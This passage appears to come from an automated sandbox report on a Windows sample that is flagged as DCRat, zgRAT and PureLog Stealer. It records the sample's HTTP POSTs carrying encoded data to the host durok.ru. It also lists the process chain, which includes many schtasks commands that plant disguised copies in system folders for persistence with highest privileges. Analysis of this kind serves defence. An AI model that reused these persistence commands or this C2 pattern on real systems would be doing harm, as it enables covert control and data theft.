                                                                                                                              Data Ascii: YX[_TUYW^XRTVQXPTS[^V_SZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')1<>9"5(^,&*4&070"<8Q"?:.\<(V )5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:19:03.672945023 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:19:03.925323009 CET795INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:03 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90Yj7qIsX1JYHtb1p%2BKBjybAOrUb0eHIOOmIyEY1I2kok2N7K3M6inuHpXSfHcsJvcylFNQuJhYB7Q%2F77SUKikh8e1bUzryhfyBJ4J3rGvJIE7QYIdf7KlWxHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263eaee5e42b5-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3199&min_rtt=1691&rtt_var=3651&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=106112&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              107192.168.2.449981104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:19:03.486768007 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:19:03.833729029 CET2128OUTData Raw: 59 5b 5b 58 54 5b 59 55 5e 58 52 54 56 5f 58 57 54 54 5b 59 56 54 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[[XT[YU^XRTV_XWTT[YVTSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[+$]<96"/.-)9$;4Z,T7<!-98>#<Y>5"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:19:04.664607048 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:19:04.917418003 CET945INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:04 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BHGVbMmIigEyyLY8SoSyEmZetIxxwPMGsVTzc0JhJIa1GdD5%2Bt63qyk1YeAdPIL%2FIECcv8ShdGTAIrJDPGklondZ9WoOyfM20XGSRta7wfxO0irhTRt9CYwE3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263f118778c57-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4542&min_rtt=1983&rtt_var=5863&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=64998&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 1e 3d 39 09 57 34 02 28 56 3f 2e 32 56 3e 31 2a 05 3c 31 2a 00 2b 2c 21 0a 3c 06 0d 18 34 3a 08 5d 29 03 38 58 25 0f 26 10 25 31 2e 5c 05 1d 27 5a 28 02 24 5a 33 22 21 5f 2b 3e 2a 42 3e 00 1c 03 27 01 34 03 20 05 35 07 34 32 24 11 2e 3c 28 5a 2e 12 20 13 28 20 0c 5a 22 17 21 51 0c 1f 38 1c 36 07 09 58 32 07 25 56 36 0e 19 1c 32 06 36 1e 22 02 37 1e 30 14 28 00 25 0a 3b 54 20 04 3b 54 3f 2e 2e 5a 31 01 3e 00 3d 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$=9W4(V?.2V>1*<1*+,!<4:])8X%&%1.\'Z($Z3"!_+>*B>'4 542$.<(Z. ( Z"!Q86X2%V626"70(%;T ;T?..Z1>=%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              108192.168.2.449983104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:19:04.199542999 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2544
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:19:04.552719116 CET2544OUTData Raw: 5c 5c 5b 5f 54 54 59 57 5e 58 52 54 56 59 58 56 54 54 5b 59 56 52 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \\[_TTYW^XRTVYXVTT[YVRS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')!+*! ,.V)*X%4;X7, T7,*X::$>3'>5"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:19:05.377367973 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:19:05.673398972 CET799INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:05 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NJqRMcY8%2BePJtQV1yzdZfwiTXiNnGlWMFPwSm7caxCcAl6RcQF7STqr6ei%2BPklsqHiuMYwgK5txE4zy0vm%2FvFUnX6DfXRTlQcsIPFiKKIBnLtzj6nu%2BRTjBJ5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263f5994a8c21-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=7275&min_rtt=1989&rtt_var=11319&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=32971&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:11:16:56
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Users\user\Desktop\Z4D3XAZ2jB.exe"
                                                                                                                              Imagebase:0x4a0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1721629037.0000000013120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1721629037.000000001272D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:1
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:3
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:4
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:5
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:6
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:7
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:8
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:9
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:10
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:11
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:12
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:13
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:14
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:15
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:16
                                                                                                                              Start time:11:17:01
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Imagebase:0x10000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:17
                                                                                                                              Start time:11:17:01
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat"
                                                                                                                              Imagebase:0x7ff7d8370000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:18
                                                                                                                              Start time:11:17:01
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:19
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Imagebase:0xa30000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:20
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Imagebase:0x9b0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:21
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\chcp.com
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:chcp 65001
                                                                                                                              Imagebase:0x7ff71a540000
                                                                                                                              File size:14'848 bytes
                                                                                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:22
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Imagebase:0xc30000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:23
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\w32tm.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                              Imagebase:0x7ff6c7dd0000
                                                                                                                              File size:108'032 bytes
                                                                                                                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:24
                                                                                                                              Start time:11:17:07
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x790000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:25
                                                                                                                              Start time:11:17:09
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
